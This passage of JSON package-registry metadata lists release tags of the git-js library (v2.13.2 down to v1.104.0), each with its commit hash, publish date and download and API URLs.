v2.13.2","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"fc848209c40616e55fc6b1f4a96702a59bdc09b6","kind":"tag","published_at":"2020-07-16T16:44:51.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.13.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"feefe70d3921df7e6a4aa3c167da293a18e14d20","kind":"tag","published_at":"2020-07-16T16:06:54.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.13.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.13.0/manifests"},{"name":"v2.12.0","sha":"aa75cb4a76d33e0430f2de94e4ca03809b1ead23","kind":"tag","published_at":"2020-07-08T05:54:41.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.12.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"ad82967c2407ee504fc3edcae16811b10270937c","kind":"tag","published_at":"2020-06-25T15:59:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.11.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.11.0/manifests"},{"name":"v2.10.0","sha":"64e85a522d03bfe56fa89c7cf620de01a6775614","kind":"tag","published_at":"2020-06-23T05:23:33.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.10.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.10.0/manifests"},{"name":"v2.9.0","sha":"da29fed30edeaeea29786c87c5522fba94cbf5eb","kind":"tag","published_at":"2020-06-20T17:19:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.9.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.9.0/manifests"},{"name":"v2.8.0","sha":"5ab92e246342d970ed93d68680cf4cf4828a7eff","kind":"tag","published_at":"2020-06-19T08:31:47.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.8.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.8.0/manifests"},{"name":"v2.7.2","sha":"9c62d44097df6afb3e40cad8a7e400a776d589a1","kind":"tag","published_at":"2020-06-18T13:34:23.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.7.2","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"d0d92e97feb71f23af35e80ae2bc3b7a62c64b05","kind":"tag","published_at":"2020-06-18T12:06:26.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.7.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"32726a63fae671554e7e238c7d13b747327a82ba","kind":"tag","published_at":"2020-06-16T11:10:09.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.7.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.7.0/manifests"},{"name":"v2.6.0","sha":"f8eef91f98790bc4ed88e1683fce711c0b4b5895","kind":"tag","published_at":"2020-06-07T08:16:59.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.6.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.6.0/manifests"},{"name":"v2.5.0","sha":"9bc9f8d60db8c2d05b1c4c4dfb6aff0bfc78ccb7","kind":"tag","published_at":"2020-05-17T13:13:47.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.5.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"94ece9d662210fc675a5b8bcd2f8c81ef7bf290d","kind":"tag","published_at":"2020-05-05T07:44:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.4.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"e46d78f33a76e6f0c286a80d172a85959b5c25a0","kind":"tag","published_at":"2020-05-03T06:53:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.3.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"2915d48fd6ee3125146459ad37af9bd6454e5d3a","kind":"tag","published_at":"2020-04-30T10:38:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.2.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"ec3f5a12ce9de66f38711cbaf084819f236a509b","kind":"tag","published_at":"2020-04-28T12:14:09.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.1.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"2e937cd6a7f5d8f6506795230a0e4ec31e4a2ee2","kind":"tag","published_at":"2020-04-28T08:01:50.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.0.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.0.0/manifests"},{"name":"newTag","sha":"497ce5c5d2ec1851058d170083b1864265b73043","kind":"commit","published_at":"2020-04-19T08:55:51.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/newTag","html_url":"https://github.com/steveukx/git-js/releases/tag/newTag","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@newTag","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/newTag","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/newTag/manifests"},{"name":"v1.132.0","sha":"04532662e5be10aaa9d2f8882de6c1d9fcb1f8ee","kind":"tag","published_at":"2020-03-12T06:46:07.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.132.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.132.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.132.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.132.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.132.0/manifests"},{"name":"v1.131.0","sha":"dbba54b7df3812ed266f31e906a67c5ad6e82dba","kind":"tag","published_at":"2020-01-26T22:22:46.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.131.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.131.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.131.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.131.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.131.0/manifests"},{"name":"v1.130.0","sha":"7b655700c6be099f4e5ae8a052742e4ea5056157","kind":"tag","published_at":"2020-01-19T09:58:50.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.130.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.130.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.130.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.130.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.130.0/manifests"},{"name":"v1.129.0","sha":"c90dfa94cfc2bcd443061d4bb3f6629811eef411","kind":"tag","published_at":"2019-12-13T17:49:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.129.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.129.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.129.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.129.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.129.0/manifests"},{"name":"v1.128.0","sha":"31794830e5dd9899fe421c7fcbb6741ec8624a9f","kind":"tag","published_at":"2019-12-06T11:55:07.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.128.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.128.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.128.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.128.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.128.0/manifests"},{"name":"v1.127.0","sha":"cbf639614f9cccacd8333546adda8d489738391c","kind":"tag","published_at":"2019-12-06T11:46:20.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.127.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.127.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.127.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.127.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.127.0/manifests"},{"name":"v1.126.0","sha":"031ace112417034c0f1b60abaa399decdcafb5b0","kind":"tag","published_at":"2019-08-31T17:14:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.126.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.126.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.126.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.126.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.126.0/manifests"},{"name":"v1.125.0","sha":"12bfcf790398a3eae03361433e2c1c1c27315ec7","kind":"tag","published_at":"2019-08-31T08:31:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.125.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.125.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.125.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.125.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.125.0/manifests"},{"name":"v1.124.0","sha":"623728939cb8a2deda5142246193976119a06afc","kind":"tag","published_at":"2019-07-28T17:27:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.124.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.124.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.124.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.124.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.124.0/manifests"},{"name":"v1.123.0","sha":"da48a4398e421521f611583dc358182e6c0c8b9e","kind":"tag","published_at":"2019-07-27T17:08:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.123.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.123.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.123.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.123.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.123.0/manifests"},{"name":"v1.122.0","sha":"662aea8ef5070c9fd19c58153f34a909e1075e34","kind":"tag","published_at":"2019-07-19T08:06:43.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.122.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.122.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.122.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.122.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.122.0/manifests"},{"name":"v1.121.0","sha":"4ecd1349876c3914b0294fcfa482c8d3add054db","kind":"tag","published_at":"2019-07-14T08:25:52.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.121.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.121.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.121.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.121.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.121.0/manifests"},{"name":"v1.120.0","sha":"03ba7548890263b10170b7ef1960f11636d91dfe","kind":"tag","published_at":"2019-07-10T06:04:24.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.120.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.120.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.120.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.120.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.120.0/manifests"},{"name":"v1.119.0","sha":"55434c572e8133cafcecf1875e52c85c99cdf7b7","kind":"tag","published_at":"2019-07-09T11:23:34.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.119.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.119.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.119.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.119.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.119.0/manifests"},{"name":"v1.118.0","sha":"fb57f675655949dc8c6ca70916ebf9f381d35317","kind":"tag","published_at":"2019-07-03T06:28:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.118.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.118.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.118.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.118.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.118.0/manifests"},{"name":"v1.117.0","sha":"4aff2ab3b3cafcd645acd39140a21d9cf0fe236f","kind":"tag","published_at":"2019-07-01T11:52:01.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.117.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.117.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.117.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.117.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.117.0/manifests"},{"name":"v1.116.0","sha":"164ad759adea687ad998c00356a4ada5601c4b0d","kind":"tag","published_at":"2019-06-19T21:07:50.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.116.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.116.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.116.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.116.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.116.0/manifests"},{"name":"v1.115.0","sha":"9401aa7028283d1700d77677257d811d9d8b5333","kind":"tag","published_at":"2019-06-15T07:16:57.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.115.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.115.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.115.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.115.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.115.0/manifests"},{"name":"v1.114.0","sha":"d521ccbb083f78638d6994a08092fabd51c90578","kind":"tag","published_at":"2019-06-15T07:11:06.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.114.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.114.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.114.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.114.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.114.0/manifests"},{"name":"v1.113.0","sha":"11fe5e8dfe271317ce902f9b1816322ac97271bd","kind":"tag","published_at":"2019-05-08T08:14:49.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.113.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.113.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.113.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.113.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.113.0/manifests"},{"name":"v1.112.0","sha":"b6d4d15a114e953b343aa64af7238911f2708624","kind":"tag","published_at":"2019-05-03T23:34:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.112.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.112.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.112.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.112.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.112.0/manifests"},{"name":"v1.111.0","sha":"cf6c9dbc5729bd9a279a101f8b1a0e0da05b4ce8","kind":"tag","published_at":"2019-05-03T17:43:37.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.111.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.111.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.111.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.111.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.111.0/manifests"},{"name":"v1.110.0","sha":"d8dd36dd2bcccf297736718e936ce5c731fc6fb0","kind":"tag","published_at":"2019-03-23T08:19:38.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.110.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.110.0/manifests"},{"name":"v1.109.0","sha":"21cf165855c99c98864ea75f9614fa3760e2061a","kind":"tag","published_at":"2019-03-22T22:14:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.109.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.109.0/manifests"},{"name":"v1.108.0","sha":"1787912f37880deeb302b75b3dfb0c0d47a42572","kind":"tag","published_at":"2019-03-22T19:21:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.108.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.108.0/manifests"},{"name":"v1.107.0","sha":"e1716dd73d91af466a379933856a6d9db839bafe","kind":"tag","published_at":"2018-11-05T14:09:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.107.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.107.0/manifests"},{"name":"v1.106.0","sha":"e202439595359ee60c9431dcb887561d986fb9d6","kind":"tag","published_at":"2018-10-26T17:29:07.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.106.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.106.0/manifests"},{"name":"v1.105.0","sha":"ef368c87fb4e1be5bbd40b1644cc8475e7bd6915","kind":"tag","published_at":"2018-10-11T21:11:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v1.105.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v1.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v1.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v1.105.0/manifests"},{"name":"v1.104.0","sha":"c8ac5bf302eab27d6f880b03b379b